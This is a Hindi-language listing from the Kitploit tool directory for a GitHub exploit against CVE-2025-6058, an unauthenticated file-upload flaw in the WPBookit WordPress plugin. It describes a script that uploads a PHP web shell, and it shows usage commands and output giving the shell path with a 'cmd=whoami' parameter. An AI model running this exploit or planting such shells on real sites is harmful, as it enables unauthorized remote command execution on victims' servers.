Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-6058 — WPBookit <= 1.0.4 - अप्रमाणित मनमानी फ़ाइल अपलोड | Kitploit
उपकरण/GitHubGitHub/nxploited/cve-2025-6058
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubnxploited/cve-2025-6058

CVE-2025-6058

WPBookit <= 1.0.4 - अप्रमाणित मनमानी फ़ाइल अपलोड

रिपॉजिटरी देखें
11 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

⚡ WPBookit <= 1.0.4 - अप्रमाणित मनमाना फ़ाइल अपलोड


📝 विवरण

WPBookit प्लगइन WordPress के लिए image_upload_handle() फ़ंक्शन में फ़ाइल प्रकार सत्यापन की कमी के कारण मनमाने फ़ाइल अपलोड के लिए संवेदनशील है, जो सभी संस्करणों में 1.0.4 तक add_booking_type रूट के माध्यम से हुक किया गया है।
यह दोष अप्रमाणित हमलावरों को प्रभावित साइट के सर्वर पर मनमानी फ़ाइलें अपलोड करने की अनुमति देता है, जिससे संभावित रूप से रिमोट कोड निष्पादन हो सकता है।

CVECVSS स्कोरसार्वजनिक रूप से प्रकाशितअंतिम अद्यतन
CVE-2025-60589.8 (गंभीर)जुलाई 11, 2025जुलाई 12, 2025

🚀 यह एक्सप्लॉइट क्या करता है?

यह एक्सप्लॉइट निम्नलिखित प्रक्रियाओं को स्वचालित करता है:

  • यह पता लगाना कि लक्ष्य WPBookit का एक संवेदनशील संस्करण (<= 1.0.4) चला रहा है या नहीं
  • प्रमाणीकरण के बिना संवेदनशील रूट का उपयोग करके PHP शेल अपलोड करना
  • शेल अपलोड की पुष्टि करना और रिमोट कमांड निष्पादन के लिए इसका सटीक पथ प्रदान करना

🛠️ उपयोग

root@kitploit:~
python3 CVE-2025-6058.py -u http://target.com/wordpress

🖥️ उदाहरण

root@kitploit:~
python3 CVE-2025-6058.py -u http://target.com/wordpress

🆘 सहायता और बैनर उदाहरण

root@kitploit:~
python CVE-2025-6058.py -help

  ______   __     __  ________       ______    ______    ______   _______            ______    ______   _______    ______  
 /      \ /  |   /  |/        |     /      \  /      \  /      \ /       |          /      \  /      \ /       |  /      \ 
/$$$$$$  |$$ |   $$ |$$$$$$$$/     /$$$$$$  |/$$$$$$  |/$$$$$$  |$$$$$$$/          /$$$$$$  |/$$$$$$  |$$$$$$$/  /$$$$$$  |
$$ |  $$/ $$ |   $$ |$$ |__  ______$$____$$ |$$$  \$$ |$$____$$ |$$ |____   ______ $$ \__$$/ $$$  \$$ |$$ |____  $$ \__$$ |
$$ |      $$  \ /$$/ $$    |/      |/    $$/ $$$$  $$ | /    $$/ $$      \ /      |$$      \ $$$$  $$ |$$      \ $$    $$< 
$$ |   __  $$  /$$/  $$$$$/ $$$$$$//$$$$$$/  $$ $$ $$ |/$$$$$$/  $$$$$$$  |$$$$$$/ $$$$$$$  |$$ $$ $$ |$$$$$$$  | $$$$$$  |
$$ \__/  |  $$ $$/   $$ |_____     $$ |_____ $$ \$$$$ |$$ |_____ /  \__$$ |        $$ \__$$ |$$ \$$$$ |/  \__$$ |$$ \__$$ |
$$    $$/    $$$/    $$       |    $$       |$$   $$$/ $$       |$$    $$/         $$    $$/ $$   $$$/ $$    $$/ $$    $$/ 
 $$$$$$/      $/     $$$$$$$$/     $$$$$$$$/  $$$$$$/  $$$$$$$$/  $$$$$$/           $$$$$$/   $$$$$$/   $$$$$$/   $$$$$$/  
                                                                                                                           
                                                                                                                           
                                                                                                                           

Exploit By : Khaled Alenazi (Nxploited ) GitHub: https://github.com/Nxploited

usage: CVE-2025-6058.py [-h] -u URL

CVE-2025-6058 WPBookit <= 1.0.4 - Unauthenticated Arbitrary File Upload | by Khaled Alenazi (Nxploited)

options:
  -h, --help     show this help message and exit
  -u, --url URL  Target URL e.g http(s)://target.com/wordpress

📤 आउटपुट

root@kitploit:~
[*] Checking plugin version ...
[*] Exploiting file upload ...
[+] Exploitation successful!
[+] Shell path: wp-content/uploads/2025/07/shell.php?cmd=whoami
Exploit By : Khaled Alenazi (Nxploited ) GitHub: https://github.com/Nxploited

⚠️ अस्वीकरण

यह उपकरण केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है।
लेखक किसी भी दुरुपयोग या अनधिकृत गतिविधि के लिए जिम्मेदार नहीं है।
अपने जोखिम पर उपयोग करें और हमेशा सुनिश्चित करें कि आपके पास लक्ष्य प्रणाली का परीक्षण करने की अनुमति है।


द्वारा: खालिद अलेनाज़ी (Nxploited)

टूल डाउनलोड करें